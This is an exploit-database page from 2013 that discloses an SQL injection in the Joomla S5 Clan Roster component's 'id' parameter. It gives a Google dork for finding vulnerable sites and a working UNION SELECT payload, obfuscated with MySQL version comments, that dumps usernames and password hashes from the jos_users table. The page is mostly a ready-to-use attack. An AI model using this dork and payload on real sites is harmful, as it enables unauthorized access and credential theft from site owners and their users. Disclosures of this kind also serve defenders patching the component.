[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla S5 Clan Roster com_s5clanroster (index.php, id param) - SQL Injection
# Published : 2013-05-13
# Author :
# Previous Title : Foe CMS 1.6.5 - Multiple Vulnerabilities
# Next Title : Cisco Linksys E4200 Firmware - Multiple Vulnerabilities


Joomla Component com_s5clanroster Sql Injection Vulnerability
==============================================================
 
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Dork           : inurl:"com_s5clanroster"
.:. Script         : http://www.shape5.com/product_details/club_extensions/s5_clan_roster.html
####################################################################
===[ Exploit ]===

Sql Injection:
==============

server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[sql]

server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null'+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users-- -
####################################################################